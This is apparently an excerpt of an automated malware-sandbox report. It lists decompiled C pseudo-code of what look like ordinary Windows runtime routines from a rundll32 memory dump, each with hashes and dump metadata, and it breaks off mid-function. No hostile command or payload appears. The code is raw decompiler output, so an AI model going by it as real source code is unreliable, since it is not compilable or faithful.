                                                                                                                • Opcode ID: 79d1fc6a4f59824b5edf37c514cfec5daf7081d2c7254c92f55780daebd6113c
                                                                                                                • Instruction ID: 71ea1af81287e8429b74c675136b657f9ddd52e7ac9f122c1cdcfe1e3b9a78c0
                                                                                                                • Opcode Fuzzy Hash: 79d1fc6a4f59824b5edf37c514cfec5daf7081d2c7254c92f55780daebd6113c
                                                                                                                • Instruction Fuzzy Hash: 3D31E231641610ABEF32DB29C940F26B765EF50724F20872FE8160B6E1EB70F811CE92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04443D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				signed short** _t33;
                                                                                                                				short* _t38;
                                                                                                                				intOrPtr* _t39;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				signed short _t43;
                                                                                                                				intOrPtr* _t47;
                                                                                                                				intOrPtr* _t53;
                                                                                                                				signed short _t57;
                                                                                                                				intOrPtr _t58;
                                                                                                                				signed short _t60;
                                                                                                                				signed short* _t61;
                                                                                                                
                                                                                                                				_t47 = __ecx;
                                                                                                                				_t61 = __edx;
                                                                                                                				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                                                                				if(_t60 > 0xfffe) {
                                                                                                                					L22:
                                                                                                                					return 0xc0000106;
                                                                                                                				}
                                                                                                                				if(__edx != 0) {
                                                                                                                					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                                                                						L5:
                                                                                                                						E04417B60(0, _t61, 0x43e11c4);
                                                                                                                						_v12 =  *_t47;
                                                                                                                						_v12 = _v12 + 0xfff8;
                                                                                                                						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                                                                						E04417B60(0xfff8, _t61,  &_v12);
                                                                                                                						_t33 = _a8;
                                                                                                                						if(_t33 != 0) {
                                                                                                                							 *_t33 = _t61;
                                                                                                                						}
                                                                                                                						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                						_t53 = _a12;
                                                                                                                						if(_t53 != 0) {
                                                                                                                							_t57 = _t61[2];
                                                                                                                							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                                                                							while(_t38 >= _t57) {
                                                                                                                								if( *_t38 == 0x5c) {
                                                                                                                									_t41 = _t38 + 2;
                                                                                                                									if(_t41 == 0) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									_t58 = 0;
                                                                                                                									if( *_t41 == 0) {
                                                                                                                										L19:
                                                                                                                										 *_t53 = _t58;
                                                                                                                										goto L7;
                                                                                                                									}
                                                                                                                									 *_t53 = _t41;
                                                                                                                									goto L7;
                                                                                                                								}
                                                                                                                								_t38 = _t38 - 2;
                                                                                                                							}
                                                                                                                							_t58 = 0;
                                                                                                                							goto L19;
                                                                                                                						} else {
                                                                                                                							L7:
                                                                                                                							_t39 = _a16;
                                                                                                                							if(_t39 != 0) {
                                                                                                                								 *_t39 = 0;
                                                                                                                								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                                                                								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                                                                								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                                                                							}
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t61 = _a4;
                                                                                                                					if(_t61 != 0) {
                                                                                                                						L3:
                                                                                                                						_t43 = L04424620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                                                                						_t61[2] = _t43;
                                                                                                                						if(_t43 == 0) {
                                                                                                                							return 0xc0000017;
                                                                                                                						}
                                                                                                                						_t61[1] = _t60;
                                                                                                                						 *_t61 = 0;
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					goto L22;
                                                                                                                				}
                                                                                                                				_t61 = _a4;
                                                                                                                				if(_t61 == 0) {
                                                                                                                					return 0xc000000d;
                                                                                                                				}
                                                                                                                				goto L3;
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2bcffa58d011e32729562f0c5c107666b814e79f9bff4d27394f116dbccc01e7
                                                                                                                • Instruction ID: e5bbbcbb1190c98f683931cb2692aeebc19557ce9a0d8946af503742d659a880
                                                                                                                • Opcode Fuzzy Hash: 2bcffa58d011e32729562f0c5c107666b814e79f9bff4d27394f116dbccc01e7
                                                                                                                • Instruction Fuzzy Hash: F0317E71B05615DBEF348F2AC841A6BBBB5EF95B10B15806BE849CB350E730E941D790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E04487016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v588;
                                                                                                                				intOrPtr _v592;
                                                                                                                				intOrPtr _v596;
                                                                                                                				signed short* _v600;
                                                                                                                				char _v604;
                                                                                                                				short _v606;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed short* _t55;
                                                                                                                				void* _t56;
                                                                                                                				signed short* _t58;
                                                                                                                				signed char* _t61;
                                                                                                                				char* _t68;
                                                                                                                				void* _t69;
                                                                                                                				void* _t71;
                                                                                                                				void* _t72;
                                                                                                                				signed int _t75;
                                                                                                                
                                                                                                                				_t64 = __edx;
                                                                                                                				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                                                                				_v8 =  *0x44fd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                                                                				_t55 = _a16;
                                                                                                                				_v606 = __ecx;
                                                                                                                				_t71 = 0;
                                                                                                                				_t58 = _a12;
                                                                                                                				_v596 = __edx;
                                                                                                                				_v600 = _t58;
                                                                                                                				_t68 =  &_v588;
                                                                                                                				if(_t58 != 0) {
                                                                                                                					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                                                                					if(_t55 != 0) {
                                                                                                                						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t8 = _t71 + 0x2a; // 0x28
                                                                                                                				_t33 = _t8;
                                                                                                                				_v592 = _t8;
                                                                                                                				if(_t71 <= 0x214) {
                                                                                                                					L6:
                                                                                                                					 *((short*)(_t68 + 6)) = _v606;
                                                                                                                					if(_t64 != 0xffffffff) {
                                                                                                                						asm("cdq");
                                                                                                                						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                                                                						 *((char*)(_t68 + 0x28)) = _a4;
                                                                                                                						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                                                                						 *((char*)(_t68 + 0x29)) = _a8;
                                                                                                                						if(_t71 != 0) {
                                                                                                                							_t22 = _t68 + 0x2a; // 0x2a
                                                                                                                							_t64 = _t22;
                                                                                                                							E04486B4C(_t58, _t22, _t71,  &_v604);
                                                                                                                							if(_t55 != 0) {
                                                                                                                								_t25 = _v604 + 0x2a; // 0x2a
                                                                                                                								_t64 = _t25 + _t68;
                                                                                                                								E04486B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                                                                							}
                                                                                                                							if(E04427D50() == 0) {
                                                                                                                								_t61 = 0x7ffe0384;
                                                                                                                							} else {
                                                                                                                								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                							}
                                                                                                                							_push(_t68);
                                                                                                                							_push(_v592 + 0xffffffe0);
                                                                                                                							_push(0x402);
                                                                                                                							_push( *_t61 & 0x000000ff);
                                                                                                                							E04449AE0();
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t35 =  &_v588;
                                                                                                                					if( &_v588 != _t68) {
                                                                                                                						_t35 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                                                                					}
                                                                                                                					L16:
                                                                                                                					_pop(_t69);
                                                                                                                					_pop(_t72);
                                                                                                                					_pop(_t56);
                                                                                                                					return E0444B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                                                                				}
                                                                                                                				_t68 = L04424620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                                                                				if(_t68 == 0) {
                                                                                                                					goto L16;
                                                                                                                				} else {
                                                                                                                					_t58 = _v600;
                                                                                                                					_t64 = _v596;
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 518a6f19e18e79d1d2011e3c2f87a6857292e00c5dddcfe599f223e5deaf0715
                                                                                                                • Instruction ID: 70bacc6db00a65be5d20172ac41751fd33d2e629fbe12a067cf1672d78709e60
                                                                                                                • Opcode Fuzzy Hash: 518a6f19e18e79d1d2011e3c2f87a6857292e00c5dddcfe599f223e5deaf0715
                                                                                                                • Instruction Fuzzy Hash: B231D0726047919BC720EF68CD50A6BB3A5BFC8700F144A2EF89587781E730F904CBA6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E0442C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                                                                				signed int* _v8;
                                                                                                                				char _v16;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed char _t33;
                                                                                                                				signed char _t43;
                                                                                                                				signed char _t48;
                                                                                                                				signed char _t62;
                                                                                                                				void* _t63;
                                                                                                                				intOrPtr _t69;
                                                                                                                				intOrPtr _t71;
                                                                                                                				unsigned int* _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				_t80 = __ecx;
                                                                                                                				_t82 = __edx;
                                                                                                                				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                                                                				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                                                                				if((_t33 & 0x00000001) != 0) {
                                                                                                                					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                                                                					if(E04427D50() != 0) {
                                                                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                					} else {
                                                                                                                						_t43 = 0x7ffe0386;
                                                                                                                					}
                                                                                                                					if( *_t43 != 0) {
                                                                                                                						_t43 = E044D8D34(_v8, _t80);
                                                                                                                					}
                                                                                                                					E04422280(_t43, _t82);
                                                                                                                					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                                                                						E0441FFB0(_t62, _t80, _t82);
                                                                                                                						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                                                                						_t30 = _t80 + 0xd0; // 0xd0
                                                                                                                						_t83 = _t30;
                                                                                                                						E044D8833(_t83,  &_v16);
                                                                                                                						_t81 = _t80 + 0x90;
                                                                                                                						E0441FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                                                                						_t63 = 0;
                                                                                                                						_push(0);
                                                                                                                						_push(_t83);
                                                                                                                						_t48 = E0444B180();
                                                                                                                						if(_a4 != 0) {
                                                                                                                							E04422280(_t48, _t81);
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t69 = _v8;
                                                                                                                						_t12 = _t80 + 0x98; // 0x98
                                                                                                                						_t13 = _t69 + 0xc; // 0x575651ff
                                                                                                                						E0442BB2D(_t13, _t12);
                                                                                                                						_t71 = _v8;
                                                                                                                						_t15 = _t80 + 0xb0; // 0xb0
                                                                                                                						_t16 = _t71 + 8; // 0x8b000cc2
                                                                                                                						E0442BB2D(_t16, _t15);
                                                                                                                						E0442B944(_v8, _t62);
                                                                                                                						 *((char*)(_t80 + 0xdc)) = 0;
                                                                                                                						E0441FFB0(0, _t80, _t82);
                                                                                                                						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                                                                						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                                                                						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                                                                						 *(_t80 + 0xde) = 0;
                                                                                                                						if(_a4 == 0) {
                                                                                                                							_t25 = _t80 + 0x90; // 0x90
                                                                                                                							E0441FFB0(0, _t80, _t25);
                                                                                                                						}
                                                                                                                						_t63 = 1;
                                                                                                                					}
                                                                                                                					return _t63;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                                                                				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                                                                				if(_a4 == 0) {
                                                                                                                					_t24 = _t80 + 0x90; // 0x90
                                                                                                                					E0441FFB0(0, __ecx, _t24);
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}
















                                                                                                                0x0442c25c
                                                                                                                0x00000000
                                                                                                                0x0442c25e
                                                                                                                0x0442c1a4
                                                                                                                0x0442c1aa
                                                                                                                0x0442c1b3
                                                                                                                0x0442c265
                                                                                                                0x0442c26c
                                                                                                                0x0442c26c
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                • Instruction ID: a2ec3e057986d0623added4113b53945a04a93de340a816fa382673cabf29043
                                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                • Instruction Fuzzy Hash: 9F312471B01596AAEF04EBB1C580BEEF754BF42248F48815FC01C57302DB747A0ADBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E04446DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _t39;
                                                                                                                				intOrPtr _t52;
                                                                                                                				intOrPtr _t53;
                                                                                                                				signed int _t59;
                                                                                                                				signed int _t63;
                                                                                                                				intOrPtr _t64;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				void* _t68;
                                                                                                                				intOrPtr _t69;
                                                                                                                				signed int _t73;
                                                                                                                				signed int _t75;
                                                                                                                				intOrPtr _t77;
                                                                                                                				signed int _t80;
                                                                                                                				intOrPtr _t82;
                                                                                                                
                                                                                                                				_t68 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_t80 = __ecx;
                                                                                                                				_t75 = _a4;
                                                                                                                				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
                                                                                                                					L23:
                                                                                                                					asm("lock inc dword [esi+0x110]");
                                                                                                                					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
                                                                                                                						asm("lock inc dword [ecx+eax+0x4]");
                                                                                                                					}
                                                                                                                					_t39 = 0;
                                                                                                                					L13:
                                                                                                                					return _t39;
                                                                                                                				}
                                                                                                                				_t63 =  *(__ecx + 0x88);
                                                                                                                				_t4 = _t68 + 7; // 0xa
                                                                                                                				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                                                                				_t59 = _t4 & 0xfffffff8;
                                                                                                                				_v8 = _t69;
                                                                                                                				if(_t75 >= _t63) {
                                                                                                                					_t75 = _t75 % _t63;
                                                                                                                					L15:
                                                                                                                					_t69 = _v8;
                                                                                                                				}
                                                                                                                				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
                                                                                                                				if(_t64 == 0) {
                                                                                                                					L14:
                                                                                                                					if(E04446EBE(_t80, _t64, _t75) != 1) {
                                                                                                                						goto L23;
                                                                                                                					}
                                                                                                                					goto L15;
                                                                                                                				}
                                                                                                                				asm("lock inc dword [ecx+0xc]");
                                                                                                                				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
                                                                                                                					goto L14;
                                                                                                                				} else {
                                                                                                                					_t73 = _t59;
                                                                                                                					asm("lock xadd [eax], edx");
                                                                                                                					if(_t73 + _t59 > _v8) {
                                                                                                                						if(_t73 <= _v8) {
                                                                                                                							 *(_t64 + 4) = _t73;
                                                                                                                						}
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t77 = _t73 + _t64;
                                                                                                                					_v8 = _t77;
                                                                                                                					 *_a12 = _t64;
                                                                                                                					_t66 = _a8;
                                                                                                                					if(_t66 == 0) {
                                                                                                                						L12:
                                                                                                                						_t39 = _t77;
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                					_t52 =  *((intOrPtr*)(_t80 + 0x10));
                                                                                                                					if(_t52 != 0) {
                                                                                                                						_t53 = _t52 - 1;
                                                                                                                						if(_t53 == 0) {
                                                                                                                							asm("rdtsc");
                                                                                                                							 *_t66 = _t53;
                                                                                                                							L11:
                                                                                                                							 *(_t66 + 4) = _t73;
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						E04436A60(_t66);
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					while(1) {
                                                                                                                						_t73 =  *0x7ffe0018;
                                                                                                                						_t82 =  *0x7FFE0014;
                                                                                                                						if(_t73 ==  *0x7FFE001C) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						asm("pause");
                                                                                                                					}
                                                                                                                					_t66 = _a8;
                                                                                                                					_t77 = _v8;
                                                                                                                					 *_t66 = _t82;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}


                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                                • Instruction ID: bb082f6ecaa34596cdc5023fc2fcb48d59bdf3a0ce89b15aa0d7de5077c66987
                                                                                                                • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                                • Instruction Fuzzy Hash: 59316E31214205DFEB24CF29C480A6AB3E6FFC6315B26C95EE4598B255DB35F906CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0443A70E(intOrPtr* __ecx, char* __edx) {
                                                                                                                				unsigned int _v8;
                                                                                                                				intOrPtr* _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t16;
                                                                                                                				intOrPtr _t17;
                                                                                                                				intOrPtr _t28;
                                                                                                                				char* _t33;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				void* _t50;
                                                                                                                				intOrPtr _t52;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t52 =  *0x44f7b10; // 0x9
                                                                                                                				_t33 = __edx;
                                                                                                                				_t48 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_t52 == 0) {
                                                                                                                					 *0x44f7b10 = 8;
                                                                                                                					 *0x44f7b14 = 0x44f7b0c;
                                                                                                                					 *0x44f7b18 = 1;
                                                                                                                					L6:
                                                                                                                					_t2 = _t52 + 1; // 0xa
                                                                                                                					E0443A990(0x44f7b10, _t2, 7);
                                                                                                                					asm("bts ecx, eax");
                                                                                                                					 *_t48 = _t52;
                                                                                                                					 *_t33 = 1;
                                                                                                                					L3:
                                                                                                                					_t16 = 0;
                                                                                                                					L4:
                                                                                                                					return _t16;
                                                                                                                				}
                                                                                                                				_t17 = L0443A840(__edx, __ecx, __ecx, _t52, 0x44f7b10, 1, 0);
                                                                                                                				if(_t17 == 0xffffffff) {
                                                                                                                					_t37 =  *0x44f7b10; // 0x9
                                                                                                                					_t3 = _t37 + 0x27; // 0x30
                                                                                                                					__eflags = _t3 >> 5 -  *0x44f7b18; // 0x1
                                                                                                                					if(__eflags > 0) {
                                                                                                                						_t38 =  *0x44f7b9c; // 0x0
                                                                                                                						_t4 = _t52 + 0x27; // 0x30
                                                                                                                						_v8 = _t4 >> 5;
                                                                                                                						_t50 = L04424620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                                                                                						__eflags = _t50;
                                                                                                                						if(_t50 == 0) {
                                                                                                                							_t16 = 0xc0000017;
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                						 *0x44f7b18 = _v8;
                                                                                                                						_t8 = _t52 + 7; // 0x10
                                                                                                                						E0444F3E0(_t50,  *0x44f7b14, _t8 >> 3);
                                                                                                                						_t28 =  *0x44f7b14; // 0x77e17b0c
                                                                                                                						__eflags = _t28 - 0x44f7b0c;
                                                                                                                						if(_t28 != 0x44f7b0c) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                                                						}
                                                                                                                						_t9 = _t52 + 8; // 0x11
                                                                                                                						 *0x44f7b14 = _t50;
                                                                                                                						_t48 = _v12;
                                                                                                                						 *0x44f7b10 = _t9;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					 *0x44f7b10 = _t37 + 8;
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				 *__ecx = _t17;
                                                                                                                				 *_t33 = 0;
                                                                                                                				goto L3;
                                                                                                                			}

















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 11f894b8b0c2f5c7e94229f00a07c8d49141db85532c46ee38ccb667c4f4d74c
                                                                                                                • Instruction ID: bc37edeafb11e43e6f5acfc2ddbe5a2db3092fe8ab7c8873a4c1ffa10259653d
                                                                                                                • Opcode Fuzzy Hash: 11f894b8b0c2f5c7e94229f00a07c8d49141db85532c46ee38ccb667c4f4d74c
                                                                                                                • Instruction Fuzzy Hash: B831AEB16202009BEB11CF18D880F6677F9FB8AB58F14095BE145A7244D7BCBD21CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E044361A0(signed int* __ecx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _t30;
                                                                                                                				intOrPtr _t31;
                                                                                                                				void* _t32;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t49;
                                                                                                                				signed int _t51;
                                                                                                                				intOrPtr _t52;
                                                                                                                				signed int _t54;
                                                                                                                				void* _t59;
                                                                                                                				signed int* _t61;
                                                                                                                				intOrPtr* _t64;
                                                                                                                
                                                                                                                				_t61 = __ecx;
                                                                                                                				_v12 = 0;
                                                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                                				_v16 = __ecx;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_t30 == 0) {
                                                                                                                					L6:
                                                                                                                					_t31 = 0;
                                                                                                                					L7:
                                                                                                                					return _t31;
                                                                                                                				}
                                                                                                                				_t32 = _t30 + 0x5d8;
                                                                                                                				if(_t32 == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				_t59 = _t32 + 0x30;
                                                                                                                				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				if(__ecx != 0) {
                                                                                                                					 *((intOrPtr*)(__ecx)) = 0;
                                                                                                                					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                                                                					_t51 =  *(_t32 + 0x10);
                                                                                                                					_t33 = _t32 + 0x10;
                                                                                                                					_v20 = _t33;
                                                                                                                					_t54 =  *(_t33 + 4);
                                                                                                                					if((_t51 | _t54) == 0) {
                                                                                                                						_t37 = E04435E50(0x43e67cc, 0, 0,  &_v12);
                                                                                                                						if(_t37 != 0) {
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                						_t52 = _v8;
                                                                                                                						asm("lock cmpxchg8b [esi]");
                                                                                                                						_t64 = _v16;
                                                                                                                						_t49 = _t37;
                                                                                                                						_v20 = 0;
                                                                                                                						if(_t37 == 0) {
                                                                                                                							if(_t64 != 0) {
                                                                                                                								 *_t64 = _v12;
                                                                                                                								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                                                                							}
                                                                                                                							E044D9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                                                                							_t31 = 1;
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                						E0440F7C0(_t52, _v12, _t52, 0);
                                                                                                                						if(_t64 != 0) {
                                                                                                                							 *_t64 = _t49;
                                                                                                                							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                                                                						}
                                                                                                                						L12:
                                                                                                                						_t31 = 1;
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					if(_t61 != 0) {
                                                                                                                						 *_t61 = _t51;
                                                                                                                						_t61[1] = _t54;
                                                                                                                					}
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}




















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e43aa790d697189a889f18117a3e5900a60eceb87af16504e428a8d2dca7c740
                                                                                                                • Instruction ID: 9a75a0467e287fc405f6eddeb257d3b0c9476255781eda6fbe3e8de75ba9ac2a
                                                                                                                • Opcode Fuzzy Hash: e43aa790d697189a889f18117a3e5900a60eceb87af16504e428a8d2dca7c740
                                                                                                                • Instruction Fuzzy Hash: 023189716053019FDB20DF09C840B67B7E4FB88B14F46496EE9989B351E7B0F805CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0440AA16(signed short* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed short _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed short _v24;
                                                                                                                				signed short _v28;
                                                                                                                				void* _v32;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
